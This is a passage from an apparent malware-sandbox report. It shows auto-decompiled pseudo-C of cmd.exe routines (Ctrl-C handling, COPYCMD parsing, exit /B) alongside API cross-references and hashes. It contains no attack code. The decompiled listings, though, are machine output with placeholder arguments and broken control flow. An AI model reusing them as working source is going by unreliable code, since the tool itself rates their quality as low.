CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(000000FF), ref: 00D884A7
DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000001), ref: 00DA036E
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D88393), ref: 00DA037C

Strings

@, xrefs: 00D8845C

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: File$NamePathRelative$CloseDeleteErrorFreeHandleInformationLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
String ID: @
API String ID: 2968197161-2766056989
Opcode ID: 7ec0c4c536440622dd2fc109711db6e3cca6fbca82617618603242e6d1113ed8
Instruction ID: f18c06d03047271c32b3e76cdc32b6f8c61a49694cdffbf35ad73b603d4921fe
Opcode Fuzzy Hash: 7ec0c4c536440622dd2fc109711db6e3cca6fbca82617618603242e6d1113ed8
Instruction Fuzzy Hash: 5E215C72E0021AAFCB10DFA5DC58AEEFBBCEB44750F104155EA11E3250EB309E059BB4

Uniqueness

Uniqueness Score: -1.00%

Function 00DA6D90, Relevance: 13.6, APIs: 9, Instructions: 67
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E00DA6D90(void* __edi, intOrPtr _a4) {
				char _v12;
				void* __ecx;
				int _t4;
				void* _t6;
				void* _t7;
				struct _IO_FILE* _t10;
				void* _t13;
				void* _t16;

				_t16 = __edi;
				_push(_t13);
				_push(_t13);
				if(_a4 == 0 || _a4 == 1) {
					EnterCriticalSection( *0xdb3858);
					 *0xdad544 = 1;
					LeaveCriticalSection( *0xdb3858);
					if( *0xdad0db != 0 &&  *0xdc3cc4 != 0) {
						_push("^C");
						_t10 = E00D97721(_t4, 2);
						_pop(_t13);
						_t4 = fflush(E00D97721(fprintf(_t10, ??), 2));
					}
					if( *0xdbb938 != 0xffffffff) {
						__imp__TryAcquireSRWLockExclusive(0xdc7f20, _t16);
						if(_t4 != 0) {
							__imp__NtCancelSynchronousIoFile( *0xdbb938, 0,  &_v12);
							__imp__ReleaseSRWLockExclusive(0xdc7f20);
						}
					}
					if(E00D97797(_t13) == 0) {
						_t7 = E00D90178(_t5);
						if(_t7 != 0) {
							__imp___get_osfhandle(0);
							FlushConsoleInputBuffer(_t7);
						}
					}
					_t6 = 1;
				} else {
					_t6 = 0;
				}
				return _t6;
			}

0x00da6d90
0x00da6d95
0x00da6d96
0x00da6d9f
0x00da6db3
0x00da6dbf
0x00da6dc5
0x00da6dd2
0x00da6ddd
0x00da6de4
0x00da6de9
0x00da6df9
0x00da6dff
0x00da6e09
0x00da6e12
0x00da6e1a
0x00da6e28
0x00da6e2f
0x00da6e2f
0x00da6e35
0x00da6e3d
0x00da6e41
0x00da6e48
0x00da6e4c
0x00da6e54
0x00da6e54
0x00da6e48
0x00da6e5a
0x00da6da6
0x00da6da6
0x00da6da6
0x00da6e60

APIs

EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00DA6DB3
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00DA6DC5
fprintf.MSVCRT ref: 00DA6DEB
fflush.MSVCRT ref: 00DA6DF9
TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20), ref: 00DA6E12
NtCancelSynchronousIoFile.NTDLL(00000000,00000000), ref: 00DA6E28
ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20), ref: 00DA6E2F
_get_osfhandle.MSVCRT ref: 00DA6E4C
FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00DA6E54

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
String ID:
API String ID: 3139166086-0
Opcode ID: d64f8b3296a07670e54a598f8a5687365c79f4775e30ae62ff1fcd078dffd942
Instruction ID: 71285a4ed7c6e92b81ab89d2e0e6e5c6c2460f2c6e7d1d86992c25ae128a01c3
Opcode Fuzzy Hash: d64f8b3296a07670e54a598f8a5687365c79f4775e30ae62ff1fcd078dffd942
Instruction Fuzzy Hash: FF119031504302FFDF216BA4EC4EF6ABB68EB46B52F18411AF505D13A1DB758942CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D95FC8, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 372
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00D95FC8(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8, WCHAR* _a12, signed int _a16, intOrPtr* _a20, intOrPtr* _a24) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				intOrPtr _v552;
				int _v556;
				intOrPtr* _v560;
				WCHAR* _v564;
				intOrPtr* _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t84;
				short _t95;
				short _t97;
				void* _t98;
				intOrPtr _t100;
				signed int _t112;
				signed int _t113;
				long _t118;
				signed int _t120;
				void* _t121;
				short _t122;
				signed char _t124;
				void* _t125;
				long _t126;
				void* _t127;
				short _t128;
				long _t136;
				signed short* _t137;
				short _t146;
				short _t147;
				void* _t148;
				signed int _t150;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				short _t156;
				signed int _t161;
				WCHAR* _t162;
				intOrPtr* _t163;
				short* _t169;
				long _t170;
				short* _t171;
				signed int _t177;
				short _t178;
				WCHAR* _t182;
				WCHAR* _t183;
				signed int _t187;
				WCHAR* _t188;
				WCHAR* _t199;
				short* _t202;
				void* _t205;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				long _t219;
				signed int _t220;
				void* _t222;
				void* _t223;
				short _t227;
				void* _t228;
				WCHAR* _t229;
				void* _t232;
				WCHAR* _t233;
				signed int _t235;
				intOrPtr* _t239;
				short* _t241;
				void* _t242;
				WCHAR* _t244;
				signed int _t246;
				short* _t248;
				WCHAR* _t250;
				signed int _t251;
				signed int _t252;
				WCHAR* _t254;
				void* _t258;
				intOrPtr _t259;
				signed int _t260;

				_t84 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t84 ^ _t260;
				_v552 = _a4;
				_v564 = _a12;
				_v560 = _a20;
				_t232 = __edx;
				_v568 = _a24;
				E00D962FA(E00D93320(L"COPYCMD"), _t232);
				_v556 = 0;
				_t162 = E00D8EA40( *((intOrPtr*)(__ecx + 0x3c)), 0, 0);
				if(E00D962FA(_t162, _t232) == 0) {
					L2:
					_t250 = _t162;
					_t217 = 0;
					_t12 =  &(_t250[1]); // 0x0
					_t169 = _t12;
					do {
						_t95 =  *_t250;
						_t250 =  &(_t250[1]);
					} while (_t95 != 0);
					_t251 = _t250 - _t169;
					_t252 = _t251 >> 1;
					if(_t251 == 0) {
						L46:
						_t170 = 0x232a;
						L48:
						E00DA5CEA(_t162, _t170, _t217, __eflags);
						L49:
						_t170 = 0x232e;
						goto L48;
					}
					if(_t252 >= 0x7fe7) {
						goto L49;
					}
					_t233 = _t162;
					_t13 =  &(_t233[1]); // 0x0
					_t171 = _t13;
					do {
						_t97 =  *_t233;
						_t233 =  &(_t233[1]);
					} while (_t97 != 0);
					_t235 = _t233 - _t171 >> 1;
					_t98 = E00D922C0(_t162, _t162);
					_t14 = _t235 + 1; // -3
					_t217 = _t14;
					E00D91040(_t162, _t14, _t98);
					_t100 = E00D93B5D(_t162, _t14);
					 *_v560 = _t100;
					if(_t100 == 1) {
						_t170 =  *0xdc3cf0;
						goto L48;
					}
					_v24 = 1;
					_v28 = 0;
					_v20 = 0x104;
					memset( &_v548, 0, 0x104);
					if(E00D90C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
						_t170 = 0x2374;
						goto L48;
					}
					_t254 =  &(_t162[_t252 + 1]);
					if( *_t254 == 0) {
						_t177 = _v28;
						__eflags = _t177;
						if(_t177 == 0) {
							_t177 =  &_v548;
						}
						 *_t177 =  *((intOrPtr*)( *0xdc3cec));
						_t112 = _v28;
						__eflags = _t112;
						if(_t112 == 0) {
							_t112 =  &_v548;
						}
						_t178 = 0x3a;
						 *((short*)(_t112 + 2)) = _t178;
						_t113 = _v28;
						__eflags = _t113;
						if(_t113 == 0) {
							_t113 =  &_v548;
						}
						 *((short*)(_t113 + 4)) = 0;
						L19:
						_t238 = _a8;
						_t217 = _a8;
						_t255 = _v552;
						if(E00D92D22(_v552, _t238, _t162) != 0) {
							goto L49;
						}
						_t163 = _v560;
						if(( *( *( *_t163 + 0x18)) & 0x00000010) == 0) {
							_t222 = 0x5c;
							_t258 = E00D92349(_t255, _t222);
							if(_t258 == 0) {
								_t259 = _v552;
							} else {
								_t259 = _t258 + 2;
							}
							_t223 = 0x5c;
							if(E00D92349( *((intOrPtr*)( *_t163 + 0x10)), _t223) == 0) {
								_t139 =  *((intOrPtr*)( *_t163 + 0x10));
							}
							E00D91040(_t259, _t238 - (_t259 - _v552 >> 1), _t139);
						}
						_t117 = _v28;
						if(_v28 == 0) {
							_t117 =  &_v548;
						}
						_t162 = _v564;
						_t217 = _a16;
						_t118 = E00D92D22(_t162, _a16, _t117);
						if(_t118 != 0) {
							goto L49;
						} else {
							_t256 = _t118;
							 *0xdc3cf0 = _t118;
							SetLastError(_t118);
							_t239 = _v568;
							_t182 = _t162;
							 *_t239 = 0;
							_t120 =  *_t162 & 0x0000ffff;
							_t217 = _t120;
							if(_t120 == 0) {
								L32:
								_t121 = 0x5c;
								if(_t217 == _t121) {
									_t183 = _t162;
									_t256 = 1;
									__eflags = 1;
									_t217 =  &(_t183[1]);
									do {
										_t122 =  *_t183;
										_t183 =  &(_t183[1]);
										__eflags = _t122 - _v556;
									} while (_t122 != _v556);
									 *((short*)(_t162 + (_t183 - _t217 >> 1) * 2 - 2)) = 0;
								}
								_t124 = GetFileAttributesW(_t162);
								if(_t124 != 0xffffffff) {
									__eflags = _t124 & 0x00000010;
									if((_t124 & 0x00000010) != 0) {
										 *_t239 = 1;
										_t256 = 1;
									}
									L36:
									if(_t256 != 0) {
										_t125 = 0x5c;
										_t126 = E00D92349(_v552, _t125);
										_t256 = _t126;
										__eflags = 0;
										_t219 = _t126;
										_t49 = _t219 + 2; // 0x2
										_t127 = _t49;
										do {
											_t187 =  *_t219;
											_t219 = _t219 + 2;
											__eflags = _t187;
										} while (_t187 != 0);
										_t188 = _t162;
										_t220 = _t219 - _t127;
										__eflags = _t220;
										_t217 = _t220 >> 1;
										_t241 =  &(_t188[1]);
										do {
											_t128 =  *_t188;
											_t188 =  &(_t188[1]);
											__eflags = _t128 - _v556;
										} while (_t128 != _v556);
										_t52 = _t217 + 1; // -1
										__eflags = _t52 + (_t188 - _t241 >> 1) - 0x7fe7;
										if(__eflags > 0) {
											goto L49;
										}
										_t217 = _a16;
										E00D918C0(_t162, _a16, _t256);
									}
									__imp__??_V@YAXPAX@Z(_v28);
									_pop(_t242);
									return E00D96FD0(0, _t162, _v8 ^ _t260, _t217, _t242, _t256);
								}
								_t136 = GetLastError();
								 *0xdc3cf0 = _t136;
								if(_t136 == 0 || _t136 == 2) {
									goto L36;
								} else {
									__eflags = _t136 - 3;
									if(__eflags == 0) {
										goto L36;
									}
									_t170 = _t136;
									goto L48;
								}
							}
							do {
								_t137 = _t182;
								_t182 =  &(_t182[1]);
							} while ( *_t182 != 0);
							_t217 =  *_t137 & 0x0000ffff;
							goto L32;
						}
					}
					_t199 = _t254;
					if( *((intOrPtr*)(E00D8D7E6(_t199))) != 0) {
						goto L46;
					}
					_t217 =  &(_t199[1]);
					do {
						_t146 =  *_t199;
						_t199 =  &(_t199[1]);
					} while (_t146 != 0);
					if(_t199 - _t217 >> 1 > 0x7fe7) {
						goto L49;
					}
					_t244 = _t254;
					_t27 =  &(_t244[1]); // -1
					_t202 = _t27;
					do {
						_t147 =  *_t244;
						_t244 =  &(_t244[1]);
					} while (_t147 != 0);
					_t246 = _t244 - _t202 >> 1;
					_t148 = E00D922C0(_t162, _t254);
					_t28 = _t246 + 1; // -4
					E00D91040(_t254, _t28, _t148);
					_t150 = _t254[1] & 0x0000ffff;
					_t227 = 0x3a;
					if(_t150 != _t227) {
						_t205 = 0x5c;
						__eflags =  *_t254 - _t205;
						if( *_t254 != _t205) {
							L61:
							_t206 = _v28;
							__eflags = _t206;
							if(_t206 == 0) {
								_t206 =  &_v548;
							}
							 *_t206 =  *((intOrPtr*)( *0xdc3cec));
							_t153 = _v28;
							__eflags = _t153;
							if(_t153 == 0) {
								_t153 =  &_v548;
							}
							 *((short*)(_t153 + 2)) = _t227;
							_t154 = _v28;
							__eflags = _t154;
							if(_t154 == 0) {
								_t154 =  &_v548;
							}
							 *((short*)(_t154 + 4)) = 0;
							_t208 = _v28;
							__eflags = _t208;
							if(_t208 == 0) {
								_t208 =  &_v548;
							}
							_t228 = _t208 + 2;
							__eflags = 0;
							do {
								_t155 =  *_t208;
								_t208 = _t208 + 2;
								__eflags = _t155;
							} while (_t155 != 0);
							_t209 = _t208 - _t228;
							__eflags = _t209;
							_t229 = _t254;
							_t210 = _t209 >> 1;
							_t73 =  &(_t229[1]); // 0x1
							_t248 = _t73;
							do {
								_t156 =  *_t229;
								_t229 =  &(_t229[1]);
								__eflags = _t156 - _v556;
							} while (_t156 != _v556);
							_t217 = _t229 - _t248 >> 1;
							__eflags = _t210 + 1 + (_t229 - _t248 >> 1) - 0x7fe7;
							if(__eflags > 0) {
								goto L49;
							}
							E00D90CF2(_t217, _t254);
							goto L19;
						}
						__eflags = _t150 - _t205;
						if(_t150 == _t205) {
							goto L18;
						}
						goto L61;
					}
					L18:
					E00D90D89(_t227, _t254);
					goto L19;
				} else {
					goto L1;
				}
				do {
					L1:
					_t161 =  *_t162 & 0x0000ffff;
					_t162 =  &(_t162[1]);
				} while (_t161 != 0);
				goto L2;
			}

0x00d95fd3
0x00d95fda
0x00d95fe0
0x00d95fea
0x00d95ff6
0x00d96005
0x00d96007
0x00d96016
0x00d96023
0x00d9602e
0x00d9603b
0x00d96048
0x00d96048
0x00d9604a
0x00d9604c
0x00d9604c
0x00d9604f
0x00d9604f
0x00d96052
0x00d96055
0x00d9605a
0x00d9605c
0x00d9605e
0x00d9f576
0x00d9f576
0x00d9f57f
0x00d9f57f
0x00d9f584
0x00d9f584
0x00000000
0x00d9f584
0x00d9606a
0x00000000
0x00000000
0x00d96070
0x00d96072
0x00d96072
0x00d96075
0x00d96075
0x00d96078
0x00d9607b
0x00d96084
0x00d96086
0x00d9608c
0x00d9608c
0x00d96091
0x00d96098
0x00d960a3
0x00d960a8
0x00d9f58b
0x00000000
0x00d9f58b
0x00d960b0
0x00d960b9
0x00d960c4
0x00d960c8
0x00d960ee
0x00d9f593
0x00000000
0x00d9f593
0x00d960f7
0x00d960fd
0x00d9f59a
0x00d9f59d
0x00d9f59f
0x00d9f5a1
0x00d9f5a1
0x00d9f5af
0x00d9f5b2
0x00d9f5b5
0x00d9f5b7
0x00d9f5b9
0x00d9f5b9
0x00d9f5c1
0x00d9f5c2
0x00d9f5c6
0x00d9f5c9
0x00d9f5cb
0x00d9f5cd
0x00d9f5cd
0x00d9f5d5
0x00d96175
0x00d96175
0x00d96178
0x00d9617a
0x00d9618a
0x00000000
0x00000000
0x00d96190
0x00d9619e
0x00d961a2
0x00d961aa
0x00d961ae
0x00d9f685
0x00d961b4
0x00d961b4
0x00d961b4
0x00d961bb
0x00d961c6
0x00d961ca
0x00d961ca
0x00d961de
0x00d961de
0x00d961e3
0x00d961e8
0x00d9f690
0x00d9f690
0x00d961ee
0x00d961f6
0x00d961fa
0x00d96201
0x00000000
0x00d96207
0x00d96208
0x00d9620a
0x00d9620f
0x00d96215
0x00d9621d
0x00d9621f
0x00d96221
0x00d96224
0x00d96229
0x00d9623a
0x00d9623c
0x00d96240
0x00d9f69b
0x00d9f69f
0x00d9f69f
0x00d9f6a0
0x00d9f6a3
0x00d9f6a3
0x00d9f6a6
0x00d9f6a9
0x00d9f6a9
0x00d9f6b8
0x00d9f6b8
0x00d96247
0x00d96250
0x00d9628d
0x00d9628f
0x00d96294
0x00d96296
0x00d96296
0x00d9626a
0x00d9626c
0x00d962a2
0x00d962a5
0x00d962aa
0x00d962ac
0x00d962ae
0x00d962b0
0x00d962b0
0x00d962b3
0x00d962b3
0x00d962b6
0x00d962b9
0x00d962b9
0x00d962be
0x00d962c0
0x00d962c0
0x00d962c2
0x00d962c4
0x00d962c7
0x00d962c7
0x00d962ca
0x00d962cd
0x00d962cd
0x00d962d8
0x00d962df
0x00d962e4
0x00000000
0x00000000
0x00d962ea
0x00d962f0
0x00d962f0
0x00d96271
0x00d9627d
0x00d9628a
0x00d9628a
0x00d96252
0x00d96258
0x00d9625f
0x00000000
0x00d9f6c2
0x00d9f6c2
0x00d9f6c5
0x00000000
0x00000000
0x00d9f57d
0x00000000
0x00d9f57d
0x00d9625f
0x00d9622d
0x00d9622d
0x00d9622f
0x00d96232
0x00d96237
0x00000000
0x00d96237
0x00d96201
0x00d96103
0x00d9610d
0x00000000
0x00000000
0x00d96113
0x00d96116
0x00d96116
0x00d96119
0x00d9611c
0x00d9612b
0x00000000
0x00000000
0x00d96131
0x00d96135
0x00d96135
0x00d96138
0x00d96138
0x00d9613b
0x00d9613e
0x00d96147
0x00d96149
0x00d9614f
0x00d96154
0x00d96159
0x00d9615f
0x00d96163
0x00d9f5e0
0x00d9f5e1
0x00d9f5e4
0x00d9f5ef
0x00d9f5ef
0x00d9f5f2
0x00d9f5f4
0x00d9f5f6
0x00d9f5f6
0x00d9f604
0x00d9f607
0x00d9f60a
0x00d9f60c
0x00d9f60e
0x00d9f60e
0x00d9f614
0x00d9f618
0x00d9f61b
0x00d9f61d
0x00d9f61f
0x00d9f61f
0x00d9f627
0x00d9f62b
0x00d9f62e
0x00d9f630
0x00d9f632
0x00d9f632
0x00d9f638
0x00d9f63b
0x00d9f63d
0x00d9f63d
0x00d9f640
0x00d9f643
0x00d9f643
0x00d9f648
0x00d9f648
0x00d9f64a
0x00d9f64c
0x00d9f64e
0x00d9f64e
0x00d9f651
0x00d9f651
0x00d9f654
0x00d9f657
0x00d9f657
0x00d9f665
0x00d9f669
0x00d9f66e
0x00000000
0x00000000
0x00d9f67b
0x00000000
0x00d9f67b
0x00d9f5e6
0x00d9f5e9
0x00000000
0x00000000
0x00000000
0x00d9f5e9
0x00d96169
0x00d96170
0x00000000
0x00000000
0x00000000
0x00000000
0x00d9603d
0x00d9603d
0x00d9603d
0x00d96040
0x00d96043
0x00000000

APIs

Part of subcall function 00D93320: _wcsnicmp.MSVCRT ref: 00D933A4

Part of subcall function 00D8EA40: wcschr.MSVCRT ref: 00D8EAB7
Part of subcall function 00D8EA40: iswspace.MSVCRT ref: 00D8EB2D
Part of subcall function 00D8EA40: wcschr.MSVCRT ref: 00D8EB49
Part of subcall function 00D8EA40: wcschr.MSVCRT ref: 00D8EB6D

Part of subcall function 00D962FA: _wcsnicmp.MSVCRT ref: 00D96367
Part of subcall function 00D962FA: _wcsnicmp.MSVCRT ref: 00D9F6F6

memset.MSVCRT ref: 00D960C8
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00007EE3,00000001), ref: 00D9620F
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00D96247
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D96252
??_V@YAXPAX@Z.MSVCRT ref: 00D96271

Strings

COPYCMD, xrefs: 00D95FFF

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
String ID: COPYCMD
API String ID: 1068965577-3727491224
Opcode ID: 6ac3ee88e73cf2e80a901f82a0ee9a021358b2f7825faaae2e5beb434123457b
Instruction ID: d3e21d4e882a1478914de35aa43123fe35afd419846a6c7ae813d0d08c5390b7
Opcode Fuzzy Hash: 6ac3ee88e73cf2e80a901f82a0ee9a021358b2f7825faaae2e5beb434123457b
Instruction Fuzzy Hash: 33D1E635A002169BCF24EF78D895ABAB3B1EF58300F594569D846D7295EB30EE41CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00D85E70, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 292
COMMONCrypto

Download Yara Rule

C-Code - Quality: 44%

			E00D85E70(void* __ecx, signed int* _a4) {
				signed int _v8;
				short _v24;
				short _v26;
				short _v28;
				signed short _v29;
				signed int _v36;
				signed int _v40;
				signed short* _v44;
				intOrPtr _v48;
				int _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t87;
				signed int _t88;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				signed int _t100;
				intOrPtr _t104;
				signed int _t107;
				short* _t117;
				signed int _t118;
				signed short* _t120;
				signed short _t122;
				signed int _t124;
				signed int _t129;
				signed int _t132;
				signed short _t133;
				signed int _t135;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				short _t148;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t162;
				void* _t163;
				signed short _t165;
				signed short _t170;
				void* _t173;
				signed int _t174;
				signed int _t177;
				intOrPtr _t178;
				void* _t189;
				signed short* _t200;
				signed int _t204;
				void* _t205;
				void* _t206;
				signed int* _t212;
				void* _t213;
				void* _t214;
				signed int _t216;
				wchar_t* _t219;
				int _t220;
				void* _t221;
				signed int _t223;
				signed int* _t225;
				signed int _t230;
				signed int _t234;

				_t230 = _t234;
				_push(__ecx);
				_push(__ecx);
				_t212 = _a4;
				_t162 = 0;
				_t219 = _t212[0xf];
				if(_t219 == 0) {
					L15:
					if( *_t212 != 0x14) {
						goto L65;
					} else {
						goto L16;
					}
				} else {
					_t205 = 0x20;
					while(1) {
						_t80 =  *_t219 & 0x0000ffff;
						if(_t80 == 0 || _t80 > _t205) {
							break;
						}
						_t219 =  &(_t219[0]);
						__eflags = _t219;
						if(_t219 != 0) {
							continue;
						} else {
						}
						break;
					}
					if(_t219 == 0) {
						goto L15;
					} else {
						__imp___wcsnicmp(_t219, L"/B", 2);
						_t234 = _t234 + 0xc;
						if(_t80 != 0) {
							L11:
							if(_t219 != 0) {
								_t80 = swscanf(_t219, L"%d",  &_v8);
								_t234 = _t234 + 0xc;
								if(_t80 == 1) {
									_t80 = _v8;
									 *0xdbb8b0 = _t80;
									if( *0xdc3ccc != _t162) {
										_t162 = _t80;
									}
								}
							}
							goto L15;
						} else {
							 *_t212 = 0x14;
							_t212[0xf] = L":EOF";
							_t219 =  &(_t219[1]);
							if(_t219 == 0) {
								L16:
								if( *0xdc3cc4 == 0) {
									L65:
									_t170 =  *0xdb3874;
									E00D8C7F7(_t80, _t170);
									_t220 =  *0xdbb8b0;
									do {
										__eflags = E00D94B60(__eflags, 0);
									} while (__eflags == 0);
									exit(_t220);
									asm("int3");
									_t83 =  *(_t162 + 0xc);
									__eflags = _t83;
									if(_t83 != 0) {
										do {
											_t216 = _t83;
											_v40 = _t216;
											_t83 =  *(_t216 + 0xc);
											__eflags = _t83;
										} while (_t83 != 0);
										_t212 = _v36;
										_t162 = _v40;
									}
									_t84 =  *_t220 & 0x0000ffff;
									__eflags = _t84;
									if(_t84 == 0) {
										L38:
										_t85 = 0;
										__eflags = 0;
										goto L39;
									} else {
										while(1) {
											_t207 = 0x2f;
											_v29 = _t170;
											__eflags = _t84 - _t207;
											if(_t84 != _t207) {
												goto L36;
											}
											_t7 = _t220 + 4; // 0x4
											_t117 = _t7;
											_t165 = _t170;
											__eflags =  *_t117 - 0x2d;
											_v52 = _t117;
											if( *_t117 == 0x2d) {
												_v29 = 1;
												_t165 = 1;
											}
											_t118 = _t165 & 0x0000ffff;
											_v36 = _t118;
											_t120 = _t220 + (_t118 + 2) * 2;
											_v44 = _t120;
											_t122 = towupper( *_t120 & 0x0000ffff);
											_pop(_t196);
											_t124 = (_t122 & 0x0000ffff) - 0x3f;
											__eflags = _t124;
											if(__eflags == 0) {
												E00DA9373(_t207, __eflags);
												__eflags = 0;
												_push(0);
												_push(0x2381);
												E00D8C108(_t196);
												 *0xdc8065 = 0;
												 *0xdc851c = 0;
												goto L93;
											} else {
												_t129 = _t124;
												__eflags = _t129;
												if(_t129 == 0) {
													__eflags = _v29;
													if(_v29 == 0) {
														_t207 = _t212;
														_t132 = E00DA9CFA(_t220 + (_v36 + 3) * 2, _t212);
														__eflags = _t132;
														if(_t132 != 0) {
															goto L93;
														} else {
															__eflags = _t212[2] & 0x00000001;
															if((_t212[2] & 0x00000001) != 0) {
																 *_t212 =  *_t212 | 0x00001000;
															}
															goto L33;
														}
													} else {
														_t200 = _v44;
														_t207 =  &(_t200[1]);
														do {
															_t133 =  *_t200;
															_t200 =  &(_t200[1]);
															__eflags = _t133 - _v48;
														} while (_t133 != _v48);
														_t196 = _t200 - _t207 >> 1;
														__eflags = _t200 - _t207 >> 1 - 1;
														if(_t200 - _t207 >> 1 > 1) {
															goto L89;
														} else {
															_t212[1] = 6;
															_t212[2] = 0;
															goto L33;
														}
													}
												} else {
													_t139 = _t129 - 5;
													__eflags = _t139;
													if(_t139 == 0) {
														__eflags = _v29;
														_t140 =  *_t212;
														if(_v29 != 0) {
															_t141 = _t140 ^ 0x00001000;
														} else {
															_t141 = _t140 | 0x00001000;
															__eflags = _t141;
														}
														goto L32;
													} else {
														_t143 = _t139 - 0xa;
														__eflags = _t143;
														if(_t143 == 0) {
															__eflags = _v29;
															_t144 =  *_t212;
															if(_v29 == 0) {
																_t141 = _t144 | 0x00000800;
															} else {
																_t141 = _t144 ^ 0x00000800;
															}
															goto L32;
														} else {
															_t145 = _t143 - 1;
															__eflags = _t145;
															if(_t145 != 0) {
																__eflags = _t145 != 0;
																if(_t145 != 0) {
																	_t148 = 0x2f;
																	_v28 = _t148;
																	_v26 =  *((intOrPtr*)(_t220 + 4));
																	_v24 = 0;
																	_push(_t220 + ((_t165 & 0x0000ffff) + 2) * 2);
																	_push(1);
																	_push(0x2375);
																	goto L91;
																} else {
																	__eflags = _v29;
																	_t154 =  *_t212;
																	if(_v29 != 0) {
																		_t155 = _t154 ^ 0x00000010;
																	} else {
																		_t155 = _t154 | 0x00000010;
																		__eflags = _t155;
																	}
																	 *_t212 = _t155;
																	_t156 = _v36;
																	__eflags =  *(_t220 + 6 + _t156 * 2);
																	if( *(_t220 + 6 + _t156 * 2) == 0) {
																		goto L33;
																	} else {
																		_t204 = (_t165 & 0x0000ffff) + 2;
																		_t196 = _t220 + _t204 * 2;
																		_push(_t220 + _t204 * 2);
																		goto L90;
																	}
																}
															} else {
																__eflags = _v29;
																_t157 =  *_t212;
																if(_v29 != 0) {
																	_t141 = _t157 ^ 0x00002000;
																} else {
																	_t141 = _t157 | 0x00002000;
																}
																L32:
																 *_t212 = _t141;
																_t196 = 0;
																_t142 = _v36;
																__eflags =  *(_t220 + 6 + _t142 * 2);
																if( *(_t220 + 6 + _t142 * 2) != 0) {
																	L89:
																	_t135 = (_t165 & 0x0000ffff) + 2;
																	__eflags = _t135;
																	_push(_t220 + _t135 * 2);
																	L90:
																	_push(1);
																	_push(0x2376);
																	L91:
																	E00D8C5A2(_t196);
																	L93:
																	_t85 = 1;
																	L39:
																	_pop(_t213);
																	_pop(_t221);
																	__eflags = _v8 ^ _t230;
																	_pop(_t163);
																	return E00D96FD0(_t85, _t163, _v8 ^ _t230, _t207, _t213, _t221);
																} else {
																	L33:
																	_t220 = _v52;
																	_t162 = _v40;
																	L34:
																	_t220 = E00D8D7E6(_t220);
																	_t84 =  *_t220 & 0x0000ffff;
																	__eflags = _t84;
																	if(_t84 == 0) {
																		goto L38;
																	} else {
																		_t170 = 0;
																		continue;
																	}
																}
															}
														}
													}
												}
											}
											goto L102;
											L36:
											_t87 = _t212[0x12];
											__eflags = _t87;
											if(_t87 != 0) {
												_t173 = 0x10;
												_t88 = E00D900B0(_t173);
												__eflags = _t88;
												if(_t88 == 0) {
													E00DA9287(_t173);
													__imp__longjmp(0xdbb8b8, 1);
													asm("int3");
													_t174 = 0xdc3ab0;
													__eflags = 0;
													do {
														_t90 =  *_t174;
														_t174 = _t174 + 2;
														__eflags = _t90;
													} while (_t90 != 0);
													_t214 = (_t174 - 0xdc3ab2 >> 1) + 1;
													_t223 = HeapAlloc(GetProcessHeap(), 8, 0xc);
													__eflags = _t223;
													if(_t223 == 0) {
														L96:
														_t94 = 1;
													} else {
